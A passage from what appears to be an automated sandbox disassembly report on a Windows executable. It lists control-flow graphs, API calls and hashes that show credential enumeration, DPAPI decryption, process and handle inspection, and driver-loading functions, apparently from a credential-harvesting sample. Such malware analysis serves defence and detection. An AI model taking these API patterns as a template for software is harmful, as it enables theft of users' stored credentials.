43034a memcpy 40532->40545 40544 4169a7 11 API calls 40533->40544 40536 4307ce 40538 430819 memset 40536->40538 40539 415b2c 11 API calls 40536->40539 40537 43077e 40537->40536 40541 4307fa 40537->40541 40537->40543 40538->40543 40540 4307e9 40539->40540 40540->40538 40540->40543 40546 4169a7 11 API calls 40541->40546 40543->40529 40544->40543 40545->40537 40546->40543 40547 441939 40572 441247 40547->40572 40550 4418ea 40551 441897 40553 442bd4 40551->40553 40554 4418e2 40551->40554 40553->40550 40576 441409 memset 40553->40576 40554->40550 40575 4414a9 12 API calls 40554->40575 40557 4308a4 40558 4308e4 40557->40558 40559 4308bc 40557->40559 40582 42b896 memset 40558->40582 40577 42c0c8 148 API calls 40559->40577 40562 4308d3 40564 4308e8 40562->40564 40565 4308d8 40562->40565 40563 430931 40563->40551 40579 42b896 memset 40564->40579 40578 4169a7 11 API calls 40565->40578 40568 4308f3 40580 42bbbe memcpy memcpy memcpy memset memcpy 40568->40580 40570 4308ff 40581 415c23 memcpy 40570->40581 40573 42b63e 14 API calls 40572->40573 40574 441259 40573->40574 40574->40550 40574->40551 40574->40557 40575->40550 40576->40553 40577->40562 40578->40558 40579->40568 40580->40570 40581->40558 40582->40563 40583 41493c EnumResourceNamesW

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                    • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                    • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 644->645 646 413ebf-413ec6 free 644->646 648 413edb-413ee2 645->648 646->648 655 413ee4 648->655 656 413ee7-413efe 648->656 662 413ea2-413eae CloseHandle 650->662 653 413e61-413e68 651->653 654 413e37-413e44 GetModuleHandleW 651->654 653->650 659 413e6a-413e76 653->659 654->653 658 413e46-413e5c GetProcAddress 654->658 655->656 656->638 658->653 659->650 662->641
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                    • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                                    • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                                                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                    • String ID: AE$BIN
                                                                                                                                                                                                                                    • API String ID: 1668488027-3931574542
                                                                                                                                                                                                                                    • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 767404330-0
                                                                                                                                                                                                                                    • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                    • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1690352074-0
                                                                                                                                                                                                                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                    • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                    • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3558857096-0
                                                                                                                                                                                                                                    • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                    • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                    • free.MSVCRT ref: 00407082
                                                                                                                                                                                                                                      • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.29913943962.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_2T10XBqS6g.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: free$memcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2037443186-0
                                                                                                                                                                                                                                    • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                    • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 40 44558e-445594 call 444b06 4->40 41 44557e-44558c call 4136c0 call 41366b 4->41 19 4455e5 5->19 20 4455e8-4455f9 5->20 10 445800-445809 6->10 11 445856-44585f 10->11 12 44580b-44581e call 40a889 call 403e2d 10->12 15 445861-445874 call 40a889 call 403c9c 11->15 16 4458ac-4458b5 11->16 42 445823-445826 12->42 49 445879-44587c 15->49 21 44594f-445958 16->21 22 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 16->22 19->20 23 445672-445683 call 40a889 call 403fbe 20->23 24 4455fb-445601 20->24 35 4459f2-4459fa 21->35 36 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 21->36 135 44592d-445945 call 40b6ef 22->135 136 44594a 22->136 84 445685 23->84 85 4456b2-4456b5 call 40b1ab 23->85 29 445605-445607 24->29 30 445603 24->30 29->23 38 445609-44560d 29->38 30->29 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 35->44 45 445b29-445b32 35->45 153 4459d0-4459e8 call 40b6ef 36->153 154 4459ed 36->154 38->23 48 44560f-445641 call 4087b3 call 40a889 call 4454bf 38->48 40->3 41->40 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 150 445665-445670 call 40b1ab 48->150 151 445643-445663 call 40a9b5 call 4087b3 48->151 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 51->11 67 44582e-445847 call 40a9b5 call 4087b3 52->67 61 445d1c-445d25 53->61 62 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->62 68 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->68 69 445b98-445ba0 54->69 73 445fae-445fb2 61->73 74 445d2b-445d3b 61->74 168 445cf5 62->168 169 445cfc-445d03 62->169 64->16 81 445884-44589d call 40a9b5 call 4087b3 65->81 138 445849 67->138 247 445c77 68->247 69->68 83 445ba2-445bcf call 4099c6 call 445403 call 445389 69->83 90 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 74->90 91 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 74->91 156 44589f 81->156 83->53 100 44568b-4456a4 call 40a9b5 call 4087b3 84->100 104 4456ba-4456c4 85->104 162 445d67-445d6c 90->162 163 445d71-445d83 call 445093 90->163 196 445e17 91->196 197 445e1e-445e25 91->197 158 4456a9-4456b0 100->158 118 4457f9 104->118 119 4456ca-4456d3 call 413cfa call 413d4c 104->119 118->6 172 4456d8-4456f7 call 40b2cc call 413fa6 119->172 135->136 136->21 138->51 150->104 151->150 153->154 154->35 156->64 158->85 158->100 174 445fa1-445fa9 call 40b6ef 162->174 163->73 168->169 179 445d05-445d13 169->179 180 445d17 169->180 206 4456fd-445796 memset * 4 call 409c70 * 3 172->206 207 4457ea-4457f7 call 413d29 172->207 174->73 179->180 180->61 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 206->207 246 445798-4457ca call 40b2cc call 409d1f call 409b98 206->246 207->10 218->73 253 445f9b 218->253 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->207 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 253->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                    • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                      • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                      • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                      • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                      • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
